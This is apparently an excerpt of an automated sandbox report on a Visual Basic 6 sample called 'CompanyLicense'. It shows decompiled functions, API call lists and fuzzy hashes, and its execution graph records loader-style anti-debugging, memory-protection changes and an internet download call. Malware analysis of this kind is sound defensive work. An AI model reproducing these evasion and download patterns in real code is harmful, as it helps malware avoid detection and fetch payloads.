                                      				L004013D6();
                                      				L004013DC();
                                      				asm("fcomp qword [0x401200]");
                                      				asm("wait");
                                      				_push(0x41168c);
                                      				L0040140C();
                                      				L0040143C();
                                      				return _t19;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411613
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041163D
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411648
                                      • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0041165A
                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 0041165F
                                      • __vbaFreeStr.MSVBVM60(0041168C,?,?,?,?,?,?,004012E6), ref: 0041167E
                                      • __vbaFreeVar.MSVBVM60(0041168C,?,?,?,?,?,?,004012E6), ref: 00411686
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#586ChkstkCopy
                                      • String ID:
                                      • API String ID: 2927221586-0
                                      • Opcode ID: 20662ab008779d6191b56aa9a7b622cd748215930fc66dcd3071416e6bad104e
                                      • Instruction ID: 09e4618c762cea16ed281a7b82bc8b24669cca391fbda1be14325449a5432391
                                      • Opcode Fuzzy Hash: 20662ab008779d6191b56aa9a7b622cd748215930fc66dcd3071416e6bad104e
                                      • Instruction Fuzzy Hash: 67012970500209EBDB00EF91C986B9E7BB4FF04748F40816AF401B71F1DBB89945CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E00411AD7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				short _v36;
                                      				signed int _t16;
                                      				short _t20;
                                      				void* _t27;
                                      				void* _t29;
                                      				intOrPtr _t30;
                                      
                                      				_t30 = _t29 - 0xc;
                                      				 *[fs:0x0] = _t30;
                                      				L004012E0();
                                      				_v16 = _t30;
                                      				_v12 = 0x4012c8;
                                      				_v8 = 0;
                                      				_t16 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t27);
                                      				_push(0x403c50);
                                      				L00401376();
                                      				L0040141E();
                                      				_push(_t16);
                                      				_push(0x403c58);
                                      				L004013B8();
                                      				asm("sbb eax, eax");
                                      				_v36 =  ~( ~( ~_t16));
                                      				L0040140C();
                                      				_t20 = _v36;
                                      				if(_t20 != 0) {
                                      					_push(0x2f);
                                      					L00401370();
                                      					_v28 = _t20;
                                      				}
                                      				_push(0x411b6d);
                                      				return _t20;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411AF3
                                      • #527.MSVBVM60(00403C50,?,?,?,?,004012E6), ref: 00411B1C
                                      • __vbaStrMove.MSVBVM60(00403C50,?,?,?,?,004012E6), ref: 00411B26
                                      • __vbaStrCmp.MSVBVM60(00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B31
                                      • __vbaFreeStr.MSVBVM60(00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B45
                                      • #569.MSVBVM60(0000002F,00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#527#569ChkstkFreeMove
                                      • String ID:
                                      • API String ID: 1161317979-0
                                      • Opcode ID: a32b04e446ce3a497a6355b8a851c52fef2ae955206f86cb34846f6d8a3d4b4a
                                      • Instruction ID: 4d12b6788da6921758621beb10029e76731b365777bc50c3df8fdd1bf8bd2940
                                      • Opcode Fuzzy Hash: a32b04e446ce3a497a6355b8a851c52fef2ae955206f86cb34846f6d8a3d4b4a
                                      • Instruction Fuzzy Hash: 73017134A40209ABDB00AFA5C842FAE7BB8AF04B40F10817AF501FB5F1EB7C59408759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E004116B5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v32;
                                      				intOrPtr* _v36;
                                      				signed int _v40;
                                      				intOrPtr* _v48;
                                      				signed int _v52;
                                      				char* _t26;
                                      				signed int _t29;
                                      				intOrPtr _t40;
                                      
                                      				_push(0x4012e6);
                                      				_push( *[fs:0x0]);
                                      				 *[fs:0x0] = _t40;
                                      				_push(0x20);
                                      				L004012E0();
                                      				_v12 = _t40;
                                      				_v8 = 0x401288;
                                      				if( *0x413010 != 0) {
                                      					_v48 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v48 = 0x413010;
                                      				}
                                      				_t26 =  &_v32;
                                      				L00401430();
                                      				_v36 = _t26;
                                      				_t29 =  *((intOrPtr*)( *_v36 + 0x1a8))(_v36, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x300))( *_v48));
                                      				asm("fclex");
                                      				_v40 = _t29;
                                      				if(_v40 >= 0) {
                                      					_v52 = _v52 & 0x00000000;
                                      				} else {
                                      					_push(0x1a8);
                                      					_push(0x403ac4);
                                      					_push(_v36);
                                      					_push(_v40);
                                      					L0040145A();
                                      					_v52 = _t29;
                                      				}
                                      				L0040144E();
                                      				asm("wait");
                                      				_push(0x41177b);
                                      				return _t29;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004116D0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,004012E6), ref: 004116F5
                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004012E6), ref: 00411722
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000001A8,?,?,?,?,?,?,?,?,004012E6), ref: 00411753
                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004012E6), ref: 00411764
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckChkstkFreeHresultNew2
                                      • String ID:
                                      • API String ID: 4127847336-0
                                      • Opcode ID: f8580a5453b2530fc23ef433abbfb0f0ebd4ae4e31724340d7c6ff473b24ef7d
                                      • Instruction ID: c0aaf02476ce0a8e4f84cfcd2f620ec5539b16ec191209a4eb2ff413db34f8aa
                                      • Opcode Fuzzy Hash: f8580a5453b2530fc23ef433abbfb0f0ebd4ae4e31724340d7c6ff473b24ef7d
                                      • Instruction Fuzzy Hash: 6E111770A00208AFCB00DFA5C849FDDBBB8FB09705F20856AF511B72A1C77D5941DB29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00411437(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v28;
                                      				char _v40;
                                      				char _v48;
                                      				char* _t18;
                                      				void* _t26;
                                      				void* _t28;
                                      				intOrPtr _t29;
                                      
                                      				_t29 = _t28 - 0xc;
                                      				 *[fs:0x0] = _t29;
                                      				L004012E0();
                                      				_v16 = _t29;
                                      				_v12 = 0x401258;
                                      				_v8 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x4012e6, _t26);
                                      				_v40 = 2;
                                      				_v48 = 2;
                                      				_t18 =  &_v48;
                                      				_push(_t18);
                                      				L004013A0();
                                      				L0040141E();
                                      				L0040143C();
                                      				_push(0x4114b9);
                                      				L0040140C();
                                      				return _t18;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411453
                                      • #536.MSVBVM60(00000002), ref: 00411489
                                      • __vbaStrMove.MSVBVM60(00000002), ref: 00411493
                                      • __vbaFreeVar.MSVBVM60(00000002), ref: 0041149B
                                      • __vbaFreeStr.MSVBVM60(004114B9,00000002), ref: 004114B3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#536ChkstkMove
                                      • String ID:
                                      • API String ID: 2104488870-0
                                      • Opcode ID: 4d3dd28cf59827caa04d209e24bcdec927641bd5309243f33278595d2d676ed9
                                      • Instruction ID: 6e137ad59e1bd904b46978aff12423ae5b23b1d0861eca15e6423218e8cd172a
                                      • Opcode Fuzzy Hash: 4d3dd28cf59827caa04d209e24bcdec927641bd5309243f33278595d2d676ed9
                                      • Instruction Fuzzy Hash: 8B013174900208ABCB00EFA5C986BDEBBB8AF04744F50816AF501B71A1D77C9945CB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E00410E93(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a20) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				long long* _v16;
                                      				char _v40;
                                      				void* _t14;
                                      				char* _t16;
                                      				void* _t21;
                                      				void* _t23;
                                      				long long* _t24;
                                      
                                      				_t24 = _t23 - 0xc;
                                      				 *[fs:0x0] = _t24;
                                      				L004012E0();
                                      				_v16 = _t24;
                                      				_v12 = 0x401208;
                                      				_v8 = 0;
                                      				_t14 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x18,  *[fs:0x0], 0x4012e6, _t21);
                                      				_t16 =  &_v40;
                                      				L00401412();
                                      				asm("fldz");
                                      				_push(_t16);
                                      				_push(_t16);
                                      				 *_t24 = __fp0;
                                      				L004013D6();
                                      				L004013DC();
                                      				asm("fcomp qword [0x401200]");
                                      				asm("wait");
                                      				_push(0x410f04);
                                      				L0040143C();
                                      				return _t14;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410EAF
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00410ED9
                                      • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410EE5
                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410EEA
                                      • __vbaFreeVar.MSVBVM60(00410F04,?,?,?,?,?,?,004012E6), ref: 00410EFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#586ChkstkFree
                                      • String ID:
                                      • API String ID: 1198234147-0
                                      • Opcode ID: eb471ee9643b88fa207f38bbfd592858992b61494404b2e6dbd64ca7e812b81f
                                      • Instruction ID: 8b06fd58f1f951ba07d5b71ec4789900f5daed13fd88298029dea63f756d61bb
                                      • Opcode Fuzzy Hash: eb471ee9643b88fa207f38bbfd592858992b61494404b2e6dbd64ca7e812b81f
                                      • Instruction Fuzzy Hash: E9F04F70900209ABCB00EF95C946F9DBBB8EF04744F5085AEF400B71B1DBB85A44CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:3.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:412
                                      Total number of Limit Nodes:14

                                      Graph

GetPEB 1891->1894 1892 568832 1895 5689a5 1892->1895 1899 568858 1892->1899 1893 5684c3 1893->1886 1893->1892 1896 56865d 1893->1896 1894->1889 1906 568b16 NtProtectVirtualMemory 1895->1906 1896->1886 1904 568b16 NtProtectVirtualMemory 1896->1904 1898 568a03 1905 568b16 NtProtectVirtualMemory 1899->1905 1902 56899f 1903->1893 1904->1886 1905->1902 1906->1898 2190 5696fd 2191 569702 2190->2191 2193 562c10 2190->2193 2194 562db8 TerminateThread 2193->2194 2196 562ed0 TerminateThread 2194->2196 2197 563e8d 2196->2197 2198 562ed5 __common_dcos_data TerminateThread 2197->2198 2199 563e92 __common_dcos_data 2198->2199 2199->2191 1914 562db8 1915 562dbb 1914->1915 1915->1915 1916 562ec8 TerminateThread 1915->1916 1917 562ed0 TerminateThread 1916->1917 1918 563e8d 1917->1918 1921 562ed5 1918->1921 1920 563e92 __common_dcos_data 1922 562edf 1921->1922 1923 562ed0 TerminateThread 1922->1923 1924 562ee4 __common_dcos_data 1922->1924 1925 563e8d __common_dcos_data 1923->1925 1924->1920 1925->1920 2200 5662f8 2201 566294 2200->2201 2202 566303 GetLongPathNameW 2200->2202 2204 566460 2202->2204 2203 5663f4 GetLongPathNameW 2203->2204 2204->2203 2205 566533 2204->2205 1926 5695b9 1927 5695c3 1926->1927 1929 569554 1926->1929 1928 5695a7 1929->1928 1930 56958c NtSetInformationThread 1929->1930 1931 56959b 1930->1931 1931->1931 2252 5632a6 2253 56833c 5 API calls 2252->2253 2254 5632bd 2253->2254 2283 566f42 GetPEB 2254->2283 2256 563400 2257 568ec1 2 API calls 2256->2257 2258 56340e 2257->2258 2259 563a12 2258->2259 2261 566f5a 2 API calls 2258->2261 2260 568ec1 2 API calls 2259->2260 2262 563a23 2260->2262 2263 563424 2261->2263 2264 568ec1 2 API calls 2262->2264 2265 568ec1 2 API calls 2263->2265 2266 563a33 2264->2266 2267 563435 2265->2267 2268 568ec1 2 API calls 2266->2268 2270 568ec1 2 API calls 2267->2270 2269 563a46 2268->2269 2271 563658 2270->2271 2271->2259 2272 568ec1 2 API calls 2271->2272 2273 5636a7 2272->2273 2273->2259 2274 568ec1 2 API calls 2273->2274 2275 
5637fd __common_dcos_data 2274->2275 2275->2259 2276 568ec1 2 API calls 2275->2276 2277 5639ca 2276->2277 2277->2259 2278 568ec1 2 API calls 2277->2278 2279 5639f7 2278->2279 2279->2259 2280 5639fc 2279->2280 2281 568ec1 2 API calls 2280->2281 2282 563a11 2281->2282 2283->2256 2206 5635e7 2207 5635f2 2206->2207 2208 563658 2207->2208 2209 568ec1 2 API calls 2207->2209 2210 563a12 2208->2210 2212 568ec1 2 API calls 2208->2212 2209->2208 2211 568ec1 2 API calls 2210->2211 2213 563a23 2211->2213 2214 5636a7 2212->2214 2215 568ec1 2 API calls 2213->2215 2214->2210 2218 568ec1 2 API calls 2214->2218 2216 563a33 2215->2216 2217 568ec1 2 API calls 2216->2217 2219 563a46 2217->2219 2220 5637fd __common_dcos_data 2218->2220 2220->2210 2221 568ec1 2 API calls 2220->2221 2222 5639ca 2221->2222 2222->2210 2223 568ec1 2 API calls 2222->2223 2224 5639f7 2223->2224 2224->2210 2225 5639fc 2224->2225 2226 568ec1 2 API calls 2225->2226 2227 563a11 2226->2227 2284 5638a7 2285 563997 2284->2285 2286 563a12 2285->2286 2288 568ec1 2 API calls 2285->2288 2287 568ec1 2 API calls 2286->2287 2289 563a23 2287->2289 2290 5639ca 2288->2290 2291 568ec1 2 API calls 2289->2291 2290->2286 2293 568ec1 2 API calls 2290->2293 2292 563a33 2291->2292 2295 568ec1 2 API calls 2292->2295 2294 5639f7 2293->2294 2294->2286 2296 5639fc 2294->2296 2297 563a46 2295->2297 2298 568ec1 2 API calls 2296->2298 2299 563a11 2298->2299 2300 5689a2 2301 5689a5 2300->2301 2304 568b16 NtProtectVirtualMemory 2301->2304 2303 568a03 2304->2303 2228 568fe0 2229 568ecb 2228->2229 2230 567c59 GetPEB 2229->2230 2231 5690eb 2230->2231 2232 5695a7 2231->2232 2233 56958c NtSetInformationThread 2231->2233 2234 56959b 2233->2234 2234->2234 1907 56726e LoadLibraryA 1908 567286 1907->1908 1953 566f6e 1954 56705d 1953->1954 1955 567679 GetPEB 1954->1955 1956 56706a 1955->1956 1957 56709b 1956->1957 1958 567679 GetPEB 1956->1958 1960 5670a8 LoadLibraryA 1957->1960 1959 56708c 1958->1959 1959->1957 1961 567679 GetPEB 1959->1961 1962 
5670b3 1960->1962 1961->1957 2305 563eaf 2307 563eb3 __common_dcos_data 2305->2307 2308 563e20 __common_dcos_data 2305->2308 2306 567c59 GetPEB 2306->2308 2308->2306 1910 56652a 1911 566460 1910->1911 1913 566533 1910->1913 1911->1910 1912 5663f4 GetLongPathNameW 1911->1912 1912->1911 2309 563cab GetPEB 2310 563cb8 2309->2310

                                      Executed Functions

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction ID: 0a1be0992238693e35cf3666cb125c100ab41819d604686a3222fff7c7ca5411
                                      • Opcode Fuzzy Hash: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction Fuzzy Hash: 39C1CD15C4D8CB47C61302B55469284FFBB3EA3934FC922DA9DA603636DB622DB487D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadMemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 3389902171-0
                                      • Opcode ID: 6624410d494d2cbd570f373df4ac4c2dc275bd7830bf4ed86f4040004c6ff9e0
                                      • Instruction ID: 0f53d5845e9e03967720a4a842f6af105994810e9e70d1ac3283b332fdf6ecbc
                                      • Opcode Fuzzy Hash: 6624410d494d2cbd570f373df4ac4c2dc275bd7830bf4ed86f4040004c6ff9e0
                                      • Instruction Fuzzy Hash: B2A1A570A043428EDF25DF38C4D8739BE91BF66364F54C799E5A58F2E6CA348842C726
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction ID: f2b03f30767e698402bd6ec86e370cb051658c098484baef9bc7e22f2bb6b046
                                      • Opcode Fuzzy Hash: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction Fuzzy Hash: C951AF25C498C64BC71306B55458380FFB77FA2A34F8922E9DDA703526DB726DB487C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction ID: 5af5dd7a5d4f5d5513a81c45093747a50a3f74192ba6742457940ef38df1633c
                                      • Opcode Fuzzy Hash: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction Fuzzy Hash: 9041C421D088C64BC72306B49458394FFB77F62628F8521D9DDA703566D7726DB4C7C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction ID: 5a881b913e50ba4896c375fa2e842d8d5a0b4a785aef45db3e41f488fb53f874
                                      • Opcode Fuzzy Hash: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction Fuzzy Hash: FC310C25C498C60BC22306B55459380FFBA3E62A38FC921D99DA60353AD7736DB887D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction ID: 0f4adc85efd90a0c5ff55c0c9d5f1633d4d46e43116c89b83198aa0f8601c2c8
                                      • Opcode Fuzzy Hash: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction Fuzzy Hash: 63314C31A00605CEEB2A5E24C8587B87FEAFFA1328FA44629C9138B594D73688C4C746
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction ID: 2aef6c200dcab7a49ca3bf2fe90cfc2d21fe9bc9097b17a99e332a54d576ec61
                                      • Opcode Fuzzy Hash: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction Fuzzy Hash: 4F31EC15C498CB07C21306B55459280FFBB3D63928BC921D99DB70353AD7632DB887D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005684C3,00000040,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00568B2F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                      • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • InternetOpenA.WININET(00565030,00000000,00000000,00000000,00000000), ref: 00564759
                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 005648C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: 0db7620123b624f9784a21a45176f9fee9e76534ac55bbfa6cf439f7cbe1218d
                                      • Instruction ID: b379d3df44972c37aa93222ec403f197c8dd8476f47b578ff1a2b68dd63bb007
                                      • Opcode Fuzzy Hash: 0db7620123b624f9784a21a45176f9fee9e76534ac55bbfa6cf439f7cbe1218d
                                      • Instruction Fuzzy Hash: 15514820C88ACB07D73206B44C653D4FFB77F42A14F8411E9ADAA47562E7726DB48BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • InternetOpenA.WININET(00565030,00000000,00000000,00000000,00000000), ref: 00564759
                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 005648C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: c806c257683450e607116dd28127b7ea244bcee24aac477895ea219b98476499
                                      • Instruction ID: ec2fac4ecf6722a138af9a4c82795f186490357923e8f9c52b1e62ff3d3204cf
                                      • Opcode Fuzzy Hash: c806c257683450e607116dd28127b7ea244bcee24aac477895ea219b98476499
                                      • Instruction Fuzzy Hash: 8A31943028038BAFEF309E64CC95BEE3AA6BF40740F508525FD499B590E7729A80DF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 306 5662f8-566301 307 566294-5662f0 306->307 308 566303-56640f GetLongPathNameW 306->308 309 566514-566531 308->309 312 5664c4-5664cd 309->312 313 566533-5665c3 309->313 315 566460-566461 312->315 316 5664cf-566512 312->316 314 5665c8-566635 313->314 320 566637-566733 314->320 317 5663f4-56640f GetLongPathNameW 315->317 318 566463-5664c3 315->318 316->309 317->309 318->312 322 566736-56693f 320->322 325 566948-56694b 322->325 326 566943 call 566f07 322->326 327 56694e-566a52 325->327 326->325 327->322 329 566a58-566a5e 327->329 329->327 330 566a64-566b96 call 566f07 * 2 call 566f1d 329->330
                                      APIs
                                      • GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00566409
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
